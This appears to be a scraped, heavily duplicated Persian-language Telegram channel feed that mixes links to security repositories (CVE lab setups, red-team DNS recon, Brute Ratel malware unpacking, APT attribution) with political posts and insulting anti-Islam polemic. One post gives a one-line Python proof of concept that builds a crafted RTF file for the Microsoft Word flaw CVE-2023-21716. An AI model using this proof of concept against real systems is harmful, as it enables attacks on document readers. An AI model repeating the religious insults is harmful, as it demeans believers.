#Command_Injection
CVE-2019-15588 :
RCE Command Injection آسیب پذیری
https://github.com/lyy289065406/CVE-2019-15588
#CVE
@PfkSecurity
CVE-2019-15588 :
RCE Command Injection آسیب پذیری
https://github.com/lyy289065406/CVE-2019-15588
#CVE
@PfkSecurity
GitHub
GitHub - EXP-Docs/CVE-2019-15588: CVE-2019-15588 靶场: RCE 命令注入漏洞
CVE-2019-15588 靶场: RCE 命令注入漏洞. Contribute to EXP-Docs/CVE-2019-15588 development by creating an account on GitHub.
CVE-2020-13933 Shiro Authentication Bypass Vulnerability
https://github.com/lyy289065406/CVE-2020-13933
#CVE #Bypass
@PfkSecurity
https://github.com/lyy289065406/CVE-2020-13933
#CVE #Bypass
@PfkSecurity
GitHub
GitHub - EXP-Docs/CVE-2020-13933: CVE-2020-13933 靶场: shiro 认证绕过漏洞
CVE-2020-13933 靶场: shiro 认证绕过漏洞. Contribute to EXP-Docs/CVE-2020-13933 development by creating an account on GitHub.
#Red_Team
مجموعه ای از OPSEC Tradecraft و TTP برای عملیات تیم قرمز
https://github.com/hack-with-ethics/dns-recon-dns-redTeaming
@PfkSecurity
@BlueRedTeam
مجموعه ای از OPSEC Tradecraft و TTP برای عملیات تیم قرمز
https://github.com/hack-with-ethics/dns-recon-dns-redTeaming
@PfkSecurity
@BlueRedTeam
GitHub
GitHub - hack-with-ethics/dns-recon-dns-redTeaming: This is a Python script that provides the ability to perform: Check all NS…
This is a Python script that provides the ability to perform: Check all NS Records for Zone Transfers. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT). Perform ...
امنیت وب و باینری، تست نفوذ، استخراج آسیب پذیری، یادداشت های مطالعه امنیتی کنترل صنعتی
https://github.com/SurrealSky/web_security
#web
@pfksecurity
https://github.com/SurrealSky/web_security
#web
@pfksecurity
GitHub
GitHub - SurrealSky/web_security: web以及二进制安全,渗透测试,漏洞挖掘,工控安全学习笔记
web以及二进制安全,渗透测试,漏洞挖掘,工控安全学习笔记. Contribute to SurrealSky/web_security development by creating an account on GitHub.
درودی دوباره بر میهن پرستان
غمگینانه در ۹ اسفند ۱۴۰۱ استاد سید جواد طباطبایی در بیمارستان لس آنجلس درگذشت.
ایشان یکی از بزرگان اندیشه ایرانشهری و همچنین متفکر سیاسی ایرانگرایی بود که با جریانات پان از جمله پان ترکیسم بسیار مقابله کرد و جمله مشهور ((پان ترکیسم ملغمه ای از بیشعوری است)) از ایشان است
این بزرگمرد خودش اهل آذربایجان و از شهر تبریز هست،که برای ایرانیان و آذری های ایران افتخار آفرینی کرده است
یاد و روانت انوشه و گرامی باد
@pfksecurity
غمگینانه در ۹ اسفند ۱۴۰۱ استاد سید جواد طباطبایی در بیمارستان لس آنجلس درگذشت.
ایشان یکی از بزرگان اندیشه ایرانشهری و همچنین متفکر سیاسی ایرانگرایی بود که با جریانات پان از جمله پان ترکیسم بسیار مقابله کرد و جمله مشهور ((پان ترکیسم ملغمه ای از بیشعوری است)) از ایشان است
این بزرگمرد خودش اهل آذربایجان و از شهر تبریز هست،که برای ایرانیان و آذری های ایران افتخار آفرینی کرده است
یاد و روانت انوشه و گرامی باد
@pfksecurity
کار دشمن هست ولی این گازها به نوعی هوشمند هستند که در حوزههای علمیه و مدارس مذهبی عمل نمیکنند!
دشمن چرا آخوند نمیزنه؟؟ پس یا دشمن با شماست که حوزه گاوداری آخوند رو نمیزنه، یا شما خودتون میزنین و میندازین گردن دشمن...
عرزشی ناموس به خطا خودت چی فکر میکنی؟ گرچه مغزی تعطیل هستین.
#نه_به_اسلام
@PfkSecurity
دشمن چرا آخوند نمیزنه؟؟ پس یا دشمن با شماست که حوزه گاوداری آخوند رو نمیزنه، یا شما خودتون میزنین و میندازین گردن دشمن...
عرزشی ناموس به خطا خودت چی فکر میکنی؟ گرچه مغزی تعطیل هستین.
#نه_به_اسلام
@PfkSecurity
brc4
Unpack Brute Ratel (BRC4) مرحلهگر و پیکربندی استخراج نیز سعی میکند در صورت پیکربندی رمزگذاریشده، کلید rc4 را پیدا کند.
https://github.com/matthw/malware_analysis/tree/main/brc4
#Malware
@PfkSecurity
Unpack Brute Ratel (BRC4) مرحلهگر و پیکربندی استخراج نیز سعی میکند در صورت پیکربندی رمزگذاریشده، کلید rc4 را پیدا کند.
https://github.com/matthw/malware_analysis/tree/main/brc4
#Malware
@PfkSecurity
GitHub
malware_analysis/brc4 at main · matthw/malware_analysis
Contribute to matthw/malware_analysis development by creating an account on GitHub.
▪️ادعاى عدالت على و فرزندانش، مضحك و متناقض
پس از ضربه كارى و كشنده ابن ملجم بر سر على(نماد جهل و توحش)
فرزندان او قاتل را تكه تكه كرده و به آتش ميكشند.
▪️سئوال:
#الف: مگر فرزندان على قاضى بودند؟
#ب: مگر فرزندان على خليفه وقت بودند؟
#ج: چرا خود على قبل از مرگش براى ضارب حكم صادر ميكند؟
#ح: مگر على قاضى وقت بود؟
#خ: چرا قاتل را نزد قاضى نبردند و بدون هيچ دادگاهى حكم صادر كردند؟
نحوه كشتن ابن ملجم را در کانال قرار میدهم.
▪️ميتوانيم بيش از صد سئوال در مورد اين اتفاق بپرسيم كه شيعيان هيچ پاسخ عاقلانه و منطقى براى آنها ندارند.
اين هم عدالتى است كه على و فرزندانش ميخواستند در جامعه پياده كنند.
اعراب اين خانواده را خوب ميشناختند و به همين دليل به آنها هيچ وقعى نگذاشته و از آنها دورى ميكردند.
#نه_به_اسلام
@pfksecurity
پس از ضربه كارى و كشنده ابن ملجم بر سر على(نماد جهل و توحش)
فرزندان او قاتل را تكه تكه كرده و به آتش ميكشند.
▪️سئوال:
#الف: مگر فرزندان على قاضى بودند؟
#ب: مگر فرزندان على خليفه وقت بودند؟
#ج: چرا خود على قبل از مرگش براى ضارب حكم صادر ميكند؟
#ح: مگر على قاضى وقت بود؟
#خ: چرا قاتل را نزد قاضى نبردند و بدون هيچ دادگاهى حكم صادر كردند؟
نحوه كشتن ابن ملجم را در کانال قرار میدهم
▪️ميتوانيم بيش از صد سئوال در مورد اين اتفاق بپرسيم كه شيعيان هيچ پاسخ عاقلانه و منطقى براى آنها ندارند.
اين هم عدالتى است كه على و فرزندانش ميخواستند در جامعه پياده كنند.
اعراب اين خانواده را خوب ميشناختند و به همين دليل به آنها هيچ وقعى نگذاشته و از آنها دورى ميكردند.
#نه_به_اسلام
@pfksecurity
🔶 رضا حاجیلو:
«سهم استان کردستان در اقتصاد ایران کمتر از یک درصد است.
با وجود سطح اتحاد علیه ج.ا. و سازماندهیای که مردم کردستان دارند،
ج.ا. از همان سال ۵۷ مجبور بود قصدا مانع توسعه و صنعتیسازی این استان شود
و به وسیلهی پروپاگاندا تصویرها و شایعههای نادرستی بِپَراکَنَدْ.
تصور کنید این ۵٪ درصد از اقتصاد ایران در این استان بود، چه بلایی به سر ج.ا. میآمد؟»
@pfksecurity
«سهم استان کردستان در اقتصاد ایران کمتر از یک درصد است.
با وجود سطح اتحاد علیه ج.ا. و سازماندهیای که مردم کردستان دارند،
ج.ا. از همان سال ۵۷ مجبور بود قصدا مانع توسعه و صنعتیسازی این استان شود
و به وسیلهی پروپاگاندا تصویرها و شایعههای نادرستی بِپَراکَنَدْ.
تصور کنید این ۵٪ درصد از اقتصاد ایران در این استان بود، چه بلایی به سر ج.ا. میآمد؟»
@pfksecurity
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
#CVE
@PfkSecurityتوافق رژیم با آل سعود
آزادی سازی ۵۰۰میلیون دلار از بدهی عراق
عدم صدور قطعنامه در آژانس
استقبال امارات از توافق
احیای لاشه ی برجام
یک نتیجه دارد :
رژیم برای ما لات است و برای جهان شکلات
چین با عربستان و ایران قراردادهای نجومی و بلند مدت دارد و بدون روابط حسنه این ۲ نمیتوانست وارد این تجارت شود .
@PfkSecurity
آزادی سازی ۵۰۰میلیون دلار از بدهی عراق
عدم صدور قطعنامه در آژانس
استقبال امارات از توافق
احیای لاشه ی برجام
یک نتیجه دارد :
رژیم برای ما لات است و برای جهان شکلات
چین با عربستان و ایران قراردادهای نجومی و بلند مدت دارد و بدون روابط حسنه این ۲ نمیتوانست وارد این تجارت شود .
@PfkSecurity
(الله دزد)
الله خودش پول چاپ نکرده و نمیکنه
فقط دارایی یه عده را میگیره میده به یه عده دیگه
حالا جامعه خودمون را نگاه کنید ببینید که این الله دزد اسلام از کی گرفته و به کی بخشیده
زنده یاد دکتر جمشیدی🥀
#نه_به_اسلام
@pfksecurity
الله خودش پول چاپ نکرده و نمیکنه
فقط دارایی یه عده را میگیره میده به یه عده دیگه
حالا جامعه خودمون را نگاه کنید ببینید که این الله دزد اسلام از کی گرفته و به کی بخشیده
زنده یاد دکتر جمشیدی🥀
#نه_به_اسلام
@pfksecurity
شناسایی گروه های APT به احتمال زیاد مسئول یک حادثه امنیت سایبری از تکنیک های MITER ATT&CK در گزارش حادثه حادثه
https://gitlab.com/bontchev/whodunit
#APT
@PfkSecurity
https://gitlab.com/bontchev/whodunit
#APT
@PfkSecurity
GitLab
Vesselin Bontchev / whodunit · GitLab
Recognizing the most likely APT groups responsible for an incident
به زودی اکثر کسایی که از شاهزاده پهلوی حمایت میکردند دست از حمایت او بر میدارند این اقا حتی نمیتونه شلوارشو بکشه بالا نه قاجار نه پهلوی نه هر گروهک دیگه ای که تا الان هست نمیتونه کشور و اداره کنه بلاخره یکی از دل مردم ایران بیرون میاد صبر کنید ...